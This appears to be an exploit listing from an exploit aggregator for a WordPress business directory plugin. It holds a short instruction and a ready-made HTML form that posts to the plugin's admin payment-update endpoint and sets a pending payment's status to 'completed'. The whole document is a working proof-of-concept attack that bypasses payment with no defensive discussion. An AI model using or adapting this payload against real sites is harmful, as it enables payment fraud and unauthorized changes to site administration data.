Share
## https://sploitus.com/exploit?id=WPEX-ID:C9911236-4AF3-4557-9BC0-217FACE534E1
Add a listing, don't complete payment (status will be pending)

<form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update">
<table>
<tbody><tr><td>
payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr>
<tr><td>
payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr>
<tr><td>
payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr>
<tr><td>
payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr>
<tr><td>
payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr>
<tr><td>
payment[payer_email]</td><td><input name="payment[payer_email]" value="badguy@example.com" size="100"></td></tr>
<tr><td>
payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr>
<tr><td>
payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr>
<tr><td>
payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr>
<tr><td>
payment_note</td><td><input name="payment_note" value="" size="100"></td></tr>
</tbody></table>
<input id="submit" type="submit" value="Submit">
</form>